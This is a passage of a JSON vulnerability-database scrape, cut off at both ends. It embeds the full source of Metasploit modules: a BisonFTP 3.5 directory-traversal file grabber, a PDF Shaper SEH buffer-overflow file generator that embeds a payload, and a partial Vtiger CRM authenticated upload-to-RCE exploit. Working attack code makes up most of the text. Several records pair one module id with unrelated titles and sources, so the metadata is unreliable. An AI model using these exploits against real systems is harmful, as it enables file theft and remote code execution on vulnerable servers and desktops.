elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-30T08:46:32", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-30T12:37:18", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-30T12:37:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-30T12:37:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-30T12:37:18", "differentElements": ["sourceData"], "edition": 85}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-02T20:42:29", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-02T20:42:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-02T20:42:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T20:42:29", "differentElements": ["sourceData"], "edition": 86}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-02T22:34:26", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-02T22:34:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-02T22:34:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T22:34:26", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 87}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T20:26:50", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-03T20:26:50"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310142841", "OPENVAS:1361412562310142840", "OPENVAS:1361412562310142842", "OPENVAS:1361412562310113490", "OPENVAS:1361412562310142831", "OPENVAS:1361412562310113488", "OPENVAS:1361412562310113487", "OPENVAS:1361412562310113489", "OPENVAS:1361412562310142830", "OPENVAS:1361412562310113486"]}, {"type": "exploitdb", "idList": ["EDB-ID:47349", "EDB-ID:47347"]}, {"type": "redhat", "idList": ["RHSA-2019:2593"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154304"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "cve", "idList": ["CVE-2019-12753"]}], "modified": "2019-09-03T20:26:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << \"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << \"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T20:26:50", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 88}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-03T22:33:32", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-03T22:33:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-03T22:33:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T22:33:32", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 89}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f56406218e2820490bbc2482df3669ed", "type": "metasploit", "bulletinFamily": "exploit", "title": "Vtiger CRM - Authenticated Logo Upload RCE", "description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against vTiger CRM v6.3.0.\n", "published": "2018-07-17T23:28:33", "modified": "2018-07-30T17:15:59", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6000", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1713"], "cvelist": ["CVE-2015-6000", "CVE-2016-1713"], "lastseen": "2019-09-09T16:43:07", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-09-09T16:43:07"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1713"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32624", "SECURITYVULNS:VULN:14750"]}, {"type": "zdt", "idList": ["1337DAY-ID-30805", "1337DAY-ID-24304", "1337DAY-ID-30084"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VTIGER_LOGO_UPLOAD_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148753", "PACKETSTORM:133755"]}, {"type": "dsquare", "idList": ["E-622"]}, {"type": "exploitdb", "idList": ["EDB-ID:38345", "EDB-ID:44379"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808752"]}], "modified": "2019-09-09T16:43:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_logo_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Vtiger CRM - Authenticated Logo Upload RCE',\n 'Description' => %q{\n Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.\n },\n 'Author' =>\n [\n 'Benjamin Daniel Mussler', # Discoverys\n 'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module\n 'SecureLayer7.net' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6000'],\n ['CVE','2016-1713'],\n ['EDB', '38345']\n ],\n 'DefaultOptions' =>\n {\n 'Encoder' => 'php/base64',\n 'RPORT' => 8888\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['vTiger CRM v6.3.0', {}],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 28 2015'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base vTiger CRM directory path', '/']),\n OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [ true, 'Password to authenticate with', ''])\n ])\n\n register_advanced_options(\n [\n OptBool.new('PHPSHORTTAG', [true, 'Use short open php tags around payload', true])\n ])\n end\n\n def check\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })\n\n unless res\n vprint_error(\"Unable to access the index.php file\")\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n vprint_error(\"Error accessing the index.php file\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\\/small>/i\n vprint_status(\"vTiger CRM version: #{$1}\")\n if $1 == '6.3.0'\n return CheckCode::Vulnerable\n else\n return CheckCode::Detected\n end\n end\n\n CheckCode::Safe\n end\n\n # Login Function.\n def login\n # Dummy Request for grabbing CSRF token and PHPSESSION ID\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for login: #{csrf}\")\n\n # Get Login now.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login',\n },\n 'vars_post' => {\n '__vtrftk' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n },\n })\n\n unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\")\n end\n\n cookie = nil\n if res.code == 302 && res.headers['Location'].include?(\"index.php?module=Users&parent=Settings&view=SystemSetup\")\n vprint_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n cookie = res.get_cookies.split[-1]\n end\n\n unless cookie\n 